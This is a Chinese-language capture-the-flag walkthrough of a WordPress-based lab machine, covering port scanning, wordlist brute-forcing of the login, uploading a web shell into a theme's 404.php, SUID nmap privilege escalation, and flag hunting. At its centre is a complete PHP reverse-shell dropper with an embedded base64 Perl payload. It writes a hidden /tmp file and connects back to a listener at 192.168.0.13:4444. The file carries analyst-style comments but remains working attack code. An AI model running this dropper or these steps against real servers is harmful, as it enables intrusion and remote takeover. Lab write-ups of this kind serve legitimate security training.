1、主机发现
2、端口扫描
nmap -sT -sV -O -A -p- 192.168.0.29
22 closed
80 open
443 open
3、访问80、443
80
443
没什么有用的东西
4、扫一波网站目录
发现两个重要的东西
/robots.txt /wp-login.php
分别访问
/robots.txt
有两个文件
/wp-login.php
可以确定CMS是wordpress
5、访问robots.txt中的两个文件
fsocity.dic
是一个字典文件
key-1-of-3.txt
这是第一个flag
6、burpsuite爆破用户名和密码
根据刚刚得到的字典,尝试爆破
先爆破用户名
username:Elliot
再爆破密码
password:ER28-0652
7、getshell
法一(蚁剑连接):
进入后台写入一句话木马
蚁剑连接
http://192.168.0.29/wp-content/themes/twentyfifteen/404.php
法二(反弹shell):
脚本中的 ip 填 kali 机器（监听端）的地址
<?php
// Reverse-shell dropper used by the write-up's second getshell route ("法二").
// Read it as an analyst: it shows which PHP primitives a planted theme file
// relies on and which artifacts it leaves behind. Nearly every call is
// `@`-suppressed, so nothing reaches the PHP error log, and the script produces
// no HTTP output — the server-side evidence is the file and the process it
// creates, not the response.

// Resolve a program name via `which`; falls back to the bare name when the
// lookup yields no output (execute() returns '' when every method fails).
function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); }

// Run a shell command through the first available exec-family function and
// return its output. The fall-through order is exec → shell_exec → system →
// passthru → popen, so `disable_functions` only blocks it when it covers all
// five. This exact chain is a common web-shell fingerprint worth flagging in
// static review of uploaded PHP.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if(function_exists('exec')) {
            @exec($cfe,$res); $res = join("\n",$res);   // exec() fills $res with output lines
        } elseif(function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif(function_exists('system')) {
            // system()/passthru() print directly; output buffering captures it instead.
            @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean();
        } elseif(function_exists('passthru')) {
            @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean();
        } elseif(@is_resource($f = @popen($cfe,"r"))) {
            $res = '';
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}

// Write base64-decoded $text to $fname; silently does nothing if fopen() fails.
function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } }

$yourip = "192.168.0.13";   // listener address (the kali box in this write-up)
$yourport = '4444';         // listener port; matches the `nc -nvlp 4444` step
$usedb = array('perl'=>'perl','c'=>'c');   // never read anywhere in this script

// Base64 payload; its first bytes decode to `#!/usr/bin/perl`, i.e. the perl
// script executed a few lines below. Because it is stored encoded, a static
// scan of the theme file has to base64-decode string constants to see what the
// payload does — a plain grep for "socket"/"sh" in the PHP will not match it.
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

// Artifact 1: a hidden dotfile in /tmp, owned by the web server's user.
// A noexec /tmp does not stop this (it is run via the interpreter, not exec'd),
// but file-integrity or audit rules on /tmp would record it.
cf('/tmp/.bc',$back_connect);

// Artifact 2: a perl process started in the background (`&`, so the HTTP
// request returns at once) with the listener address and port as argv. Its
// ancestry is typically web server → sh → perl; that ancestry plus an outbound
// connection from the web tier is the signal to hunt for. The return value is
// discarded.
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
kali起一个监听
nc -nvlp 4444
浏览器访问
http://192.168.0.29/wordpress/wp-content/themes/twentyfifteen/404.php
上线
8、提权
上线的用户权限不足
/home目录下有个robot用户
/home/robot 目录下有第二个flag和一个存放密码 md5 哈希值（不是加密）的文件
key-2-of-3.txt
权限不足,看来得先切换到robot用户
password.raw-md5
md5 哈希破解（查表还原）后:abcdefghijklmnopqrstuvwxyz
切换到robot用户,并访问第二个flag
利用 SUID 提权(其它提权方式没有试)
find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \;
使用nmap提权
nmap --interactive nmap> !sh
找剩余的flag
find / -name "key*of*"